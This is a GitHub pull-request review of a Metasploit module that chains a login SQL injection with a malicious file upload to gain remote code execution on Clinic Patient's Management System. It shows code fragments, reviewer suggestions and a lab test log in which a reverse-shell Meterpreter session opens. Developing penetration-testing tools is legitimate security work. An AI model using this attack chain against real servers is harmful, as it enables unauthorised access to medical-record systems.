Clinic Patient's Management System SQLi (CVE-2025-3096) #20177
Conversation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
msutovsky-r7
changed the title
|
Is this software used/deployed in the real world™? |
I don't think so, there's no results on Shodan. But there seems to be some "user" activity at source site. |
sjanusz-r7
reviewed
May 15, 2025
| ['CVE', '2025-3096'], | ||
| ['URL', 'https://www.cve.org/CVERecord?id=CVE-2022-40471'], | ||
| ], | ||
| 'DisclosureDate' => '2021-10-21', |
There was a problem hiding this comment.
I think this disclosure date is not quite correct
|
|
||
| register_options([ | ||
| OptString.new('TARGETURI', [true, 'Base path to the Clinic Patient Management System', '/pms']), | ||
| OptBool.new('DELETE_FILES', [true, 'Delete uploaded files after exploitation', false]) |
There was a problem hiding this comment.
Suggested change
| OptBool.new('DELETE_FILES', [true, 'Delete uploaded files after exploitation', false]) | |
| OptBool.new('DELETE_FILES', [true, 'Delete uploaded files after exploitation', true]) |
| print_status('Checking if target is vulnerable...') | ||
|
|
||
| res = send_request_cgi({ | ||
| 'uri' => normalize_uri(target_uri.path + '/'), |
There was a problem hiding this comment.
I think we can get away without the + here, but I would need to verify this 👍
Suggested change
| 'uri' => normalize_uri(target_uri.path + '/'), | |
| 'uri' => normalize_uri(target_uri.path), |
| return Exploit::CheckCode::Unknown('Unexpected content of body') if res.body&.blank? | ||
| return Exploit::CheckCode::Safe('Clinic PMS not detected') unless res.body.include?("Clinic's Patient Management System in PHP") | ||
|
|
||
| return Exploit::CheckCode::Vulnerable('Clinic PMS detected') |
There was a problem hiding this comment.
I believe it would be detected as Vulnerable only after a version check:
Suggested change
| return Exploit::CheckCode::Vulnerable('Clinic PMS detected') | |
| return Exploit::CheckCode::Appears('Clinic PMS detected') |
| fail_with Failure::NotVulnerable, 'Application might be patched' unless res.headers&.key?('location') | ||
|
|
||
| fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['location'] == 'dashboard.php' | ||
| print_status('Logged using SQL injection..') |
There was a problem hiding this comment.
Could we call to report_vuln to report this service as being vulnerable? 👀 You may need to also call report_service as well.
Unsure if that should go in run/check method or this method though
jheysel-r7
reviewed
May 16, 2025
There was a problem hiding this comment.
Great module @msutovsky-r7! A couple minor comments.
Testing
msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Logged using SQL injection..
[*] Malicious file uploaded..
[*] Logged out..
[*] Logged using SQL injection..
[*] Reporting vulnerability
[*] Sending stage (40004 bytes) to 172.16.199.134
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.134:36072) at
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : msfuser-virtual-machine
OS : Linux msfuser-virtual-machine 6.8.0-59-generic #61~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 17:03:15 UTC 2 x86_64
Meterpreter : php/linux
meterpreter >
|
|
||
| def login_sqli | ||
| res = send_request_cgi({ | ||
| 'uri' => normalize_uri(target_uri.path + 'index.php'), |
There was a problem hiding this comment.
Suggested change
| 'uri' => normalize_uri(target_uri.path + 'index.php'), | |
| 'uri' => normalize_uri(target_uri.path, 'index.php'), |
| data_post << "--#{boundary}--\r\n" | ||
|
|
||
| res = send_request_cgi({ | ||
| 'uri' => normalize_uri('/pms/update_user.php'), |
There was a problem hiding this comment.
Suggested change
| 'uri' => normalize_uri('/pms/update_user.php'), | |
| 'uri' => normalize_uri(target_uri.path, '/update_user.php'), |
| ) | ||
|
|
||
| res = send_request_cgi({ | ||
| 'uri' => normalize_uri(target_uri.path + '/update_user.php'), |
There was a problem hiding this comment.
Suggested change
| 'uri' => normalize_uri(target_uri.path + '/update_user.php'), | |
| 'uri' => normalize_uri(target_uri.path, '/update_user.php'), |
| fail_with Failure::PayloadFailed, 'Cannot find path to payload' if payload_path.blank? | ||
|
|
||
| send_request_cgi({ | ||
| 'uri' => normalize_uri(target_uri.path + '/' + payload_path), |
There was a problem hiding this comment.
Suggested change
| 'uri' => normalize_uri(target_uri.path + '/' + payload_path), | |
| 'uri' => normalize_uri(target_uri.path, payload_path), |
| fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 302 | ||
| fail_with Failure::NotVulnerable, 'Application might be patched' unless res.headers&.key?('Location') | ||
|
|
||
| fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['Location'] == 'congratulation.php?goto_page=users.php&message=user update successfully' |
There was a problem hiding this comment.
Suggested change
| fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['Location'] == 'congratulation.php?goto_page=users.php&message=user update successfully' | |
| fail_with Failure::UnexpectedReply, 'Failed to update user when attempting to exploit' unless res.headers['Location'] == 'congratulation.php?goto_page=users.php&message=user update successfully' |
| include Msf::Exploit::PhpEXE | ||
| include Msf::Exploit::FileDropper | ||
| include Msf::Post::File | ||
| include Msf::Auxiliary::Report |
There was a problem hiding this comment.
Suggested change
| include Msf::Auxiliary::Report | |
| include Msf::Auxiliary::Report | |
| prepend Msf::Exploit::Remote::AutoCheck |
| This module exploits an SQL injection in login portal, which allows to log in as admin. Next, it allows the attacker to upload malicious files through user modification to achieve RCE. | ||
| }, | ||
| 'Author' => [ | ||
| 'msutovsky-r7' # CVE-2025-3096, module developer |
There was a problem hiding this comment.
Could we add to the authors list whoever discovered the CVEs or wrote the original PoCs if possible?
| 'Notes' => { | ||
| 'Stability' => [CRASH_SAFE], | ||
| 'Reliability' => [REPEATABLE_SESSION], | ||
| 'SideEffects' => [ARTIFACTS_ON_DISK] |
There was a problem hiding this comment.
/var/log/apache2/access.log
172.16.199.1 - - [16/May/2025:12:51:58 -0700] "GET /clinic-pms/pms/user_images/1747425118rFrCYGBx.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1"
Suggested change
| 'SideEffects' => [ARTIFACTS_ON_DISK] | |
| 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] |
| fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 302 | ||
| fail_with Failure::NotVulnerable, 'Application might be patched' unless res.headers&.key?('Location') | ||
|
|
||
| fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['Location'] == 'index.php' |
There was a problem hiding this comment.
Suggested change
| fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['Location'] == 'index.php' | |
| fail_with Failure::UnexpectedReply, 'The Location header was not equal to \'index.php\' as expected' unless res.headers['Location'] == 'index.php' |
| @@ -0,0 +1,67 @@ | |||
| ## Vulnerable Application | |||
| Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability (CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution. | |||
There was a problem hiding this comment.
Suggested change
| Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability (CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution. | |
| Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability | |
| (CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Vulnerable Application
Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability (CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution.
Verification Steps
Vulnerable Application Installation Setup
Install Clinic's Patient Management System on your web server.
Start
msfconsoleand load the exploit module:If the target is vulnerable, you will see a message indicating that the target is susceptible to the exploit:
Options
TARGETURI: (Required) The base path to the Clinic Patient Management System (default:/pms).Scenarios